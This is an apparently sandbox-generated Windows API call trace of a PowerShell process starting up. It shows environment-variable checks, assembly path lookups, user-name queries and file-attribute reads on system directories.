	[0226.758] ReportEventW (hEventLog=0x4ed0004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x32745c4*="Variable", lpRawData=0x3274480) returned 1
	[0226.759] GetLastError () returned 0x0
	[0226.761] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3582a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0226.761] GetLastError () returned 0xcb
	[0226.764] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3582a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0226.764] GetLastError () returned 0xcb
	[0226.765] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xae524, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0226.765] GetLastError () returned 0xcb
	[0226.765] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xae4d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0226.765] GetLastError () returned 0xcb
	[0226.766] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xae4d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0226.766] GetLastError () returned 0xcb
	[0226.766] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xae4d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0226.766] GetLastError () returned 0xcb
	[0226.991] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x358a60, nSize=0xaeb24 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xaeb24) returned 0x1
	[0226.991] GetLastError () returned 0x3
	[0226.991] GetUserNameW (in: lpBuffer=0x3582a0, pcbBuffer=0xaeb2c | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xaeb2c) returned 1
	[0226.992] ReportEventW (hEventLog=0x4ed0004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x32824b0*="Certificate", lpRawData=0x328236c) returned 1
	[0227.106] GetLastError () returned 0x0
	[0227.121] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3582a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0227.121] GetLastError () returned 0xcb
	[0227.128] GetLogicalDrives () returned 0x4
	[0227.128] GetLastError () returned 0xcb
	[0227.128] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xae69c, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0227.128] GetLastError () returned 0xcb
	[0227.128] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0227.128] GetLastError () returned 0xcb
	[0227.129] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x3582a0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0227.129] GetLastError () returned 0xcb
	[0227.131] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3582a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0227.131] GetLastError () returned 0xcb
	[0227.131] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3582a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0227.131] GetLastError () returned 0xcb
	[0227.150] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3582a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0227.150] GetLastError () returned 0xcb
	[0227.297] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3582a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0227.297] GetLastError () returned 0xcb
	[0227.298] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xae4e4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0227.298] GetLastError () returned 0xcb
	[0227.298] SetErrorMode (uMode=0x1) returned 0x1
	[0227.298] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x32893d0 | out: lpFileInformation=0x32893d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe13712, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0xc893570, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0xc893570, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x80000)) returned 1
	[0227.298] GetLastError () returned 0xcb
	[0227.298] SetErrorMode (uMode=0x1) returned 0x1
	[0227.298] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xae4ec, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0227.298] GetLastError () returned 0xcb
	[0227.298] SetErrorMode (uMode=0x1) returned 0x1
	[0227.298] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x3289564 | out: lpFileInformation=0x3289564*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe13712, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0xc893570, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0xc893570, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x80000)) returned 1
	[0227.299] GetLastError () returned 0xcb
	[0227.299] SetErrorMode (uMode=0x1) returned 0x1
	[0227.301] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xae634, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0227.301] GetLastError () returned 0xcb
	[0227.301] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xae5b0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0227.301] GetLastError () returned 0xcb
	[0227.301] SetErrorMode (uMode=0x1) returned 0x1
	[0227.301] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xaea30 | out: lpFileInformation=0xaea30*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0227.301] GetLastError () returned 0xcb
	[0227.301] SetErrorMode (uMode=0x1) returned 0x1
	[0227.302] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xae5b0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0227.302] GetLastError () returned 0xcb
	[0227.302] SetErrorMode (uMode=0x1) returned 0x1
	[0227.302] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xaea30 | out: lpFileInformation=0xaea30*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0227.302] GetLastError () returned 0xcb
	[0227.302] SetErrorMode (uMode=0x1) returned 0x1
	[0227.302] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xae5c4, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0227.302] GetLastError () returned 0xcb
	[0227.302] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xae560, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0227.302] GetLastError () returned 0xcb
	[0227.302] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0xae5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0227.302] GetLastError () returned 0xcb
	[0227.302] SetErrorMode (uMode=0x1) returned 0x1
	[0227.302] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0xaea30 | out: lpFileInformation=0xaea30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0227.302] GetLastError () returned 0xcb
	[0227.302] SetErrorMode (uMode=0x1) returned 0x1
	[0227.302] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0xae5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0227.302] GetLastError () returned 0xcb
	[0227.302] SetErrorMode (uMode=0x1) returned 0x1
	[0227.303] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0xaea30 | out: lpFileInformation=0xaea30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0227.303] GetLastError () returned 0xcb
	[0227.303] SetErrorMode (uMode=0x1) returned 0x1
	[0227.303] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0xae5c4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0227.303] GetLastError () returned 0xcb
	[0227.303] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0xae560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0227.303] GetLastError () returned 0xcb
	[0227.593] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xae5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0227.593] GetLastError () returned 0xcb
	[0227.593] SetErrorMode (uMode=0x1) returned 0x1
	[0227.593] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xaea30 | out: lpFileInformation=0xaea30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe13712, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0xc893570, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0xc893570, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x80000)) returned 1
	[0227.593] GetLastError () returned 0xcb
	[0227.593] SetErrorMode (uMode=0x1) returned 0x1
	[0227.593] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xae5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0227.593] GetLastError () returned 0xcb
	[0227.593] SetErrorMode (uMode=0x1) returned 0x1
	[0227.593] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xaea30 | out: lpFileInformation=0xaea30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe13712, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0xc893570, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0xc893570, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x80000)) returned 1
	[0227.594] GetLastError () returned 0xcb
	[0227.594] SetErrorMode (uMode=0x1) returned 0x1
	[0227.594] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xae5c4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0227.594] GetLastError () returned 0xcb
	[0227.594] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0xae560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0227.594] GetLastError () returned 0xcb
	[0227.594] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0xae5bc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0227.594] GetLastError () returned 0xcb
	[0227.594] SetErrorMode (uMode=0x1) returned 0x1
	[0227.594] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0xaea3c | out: lpFileInformation=0xaea3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0227.594] GetLastError () returned 0xcb
	[0227.594] SetErrorMode (uMode=0x1) returned 0x1
	[0227.594] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0xae5bc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0227.595] GetLastError () returned 0xcb
	[0227.595] SetErrorMode (uMode=0x1) returned 0x1
	[0227.595] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0xaea3c | out: lpFileInformation=0xaea3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0227.595] GetLastError () returned 0xcb
	[0227.595] SetErrorMode (uMode=0x1) returned 0x1
	[0227.595] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0xae5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0227.595] GetLastError () returned 0xcb
	[0227.595] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0xae56c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0227.595] GetLastError () returned 0xcb
	[0227.595] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xae5bc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0227.595] GetLastError () returned 0xcb
	[0227.595] SetErrorMode (uMode=0x1) returned 0x1
	[0227.595] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xaea3c | out: lpFileInformation=0xaea3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe13712, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0xc893570, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0xc893570, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x80000)) returned 1
	[0227.595] GetLastError () returned 0xcb
	[0227.595] SetErrorMode (uMode=0x1) returned 0x1
	[0227.595] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xae5bc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0227.596] GetLastError () returned 0xcb
	[0227.596] SetErrorMode (uMode=0x1) returned 0x1
	[0227.596] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xaea3c | out: lpFileInformation=0xaea3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe13712, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0xc893570, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0xc893570, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x80000)) returned 1
	[0227.596] GetLastError () returned 0xcb
	[0227.596] SetErrorMode (uMode=0x1) returned 0x1
	[0227.596] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xae5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0227.596] GetLastError () returned 0xcb
	[0227.596] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0xae56c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0227.596] GetLastError () returned 0xcb
	[0227.618] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xae68c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0227.618] GetLastError () returned 0xcb
	[0227.618] SetErrorMode (uMode=0x1) returned 0x1
	[0227.618] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x2a3f548 | out: lpFileInformation=0x2a3f548*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe13712, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0xc893570, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0xc893570, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x80000)) returned 1
	[0227.618] GetLastError () returned 0xcb
	[0227.618] SetErrorMode (uMode=0x1) returned 0x1
	[0227.715] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae6d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.715] GetLastError () returned 0xcb
	[0227.715] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae684, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.715] GetLastError () returned 0xcb
	[0227.715] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae684, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.715] GetLastError () returned 0xcb
	[0227.715] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae684, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.715] GetLastError () returned 0xcb
	[0227.912] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x358a60, nSize=0xaec28 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xaec28) returned 0x1
	[0227.913] GetLastError () returned 0xcb
	[0227.913] GetUserNameW (in: lpBuffer=0x3582a0, pcbBuffer=0xaec30 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xaec30) returned 1
	[0227.915] ReportEventW (hEventLog=0x4ed0004, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2a6029c*="Available", lpRawData=0x2a60158) returned 1
	[0228.026] GetLastError () returned 0x0
	[0228.027] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3582a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0228.027] GetLastError () returned 0xcb
	[0228.028] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3582a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0228.028] GetLastError () returned 0xcb
	[0228.039] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae708, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.039] GetLastError () returned 0xcb
	[0228.039] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae6b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.039] GetLastError () returned 0xcb
	[0228.039] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae6b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.039] GetLastError () returned 0xcb
	[0228.044] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae6ac, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.044] GetLastError () returned 0xcb
	[0228.044] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae65c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.044] GetLastError () returned 0xcb
	[0228.044] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae65c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.044] GetLastError () returned 0xcb
	[0228.045] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x3582a0, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0228.045] GetLastError () returned 0xcb
	[0228.045] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x3582a0, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0228.045] GetLastError () returned 0xcb
	[0228.045] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae6ac, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.045] GetLastError () returned 0xcb
	[0228.045] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae65c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.045] GetLastError () returned 0xcb
	[0228.045] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae65c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.045] GetLastError () returned 0xcb
	[0228.046] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xae6ac, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.046] GetLastError () returned 0xcb
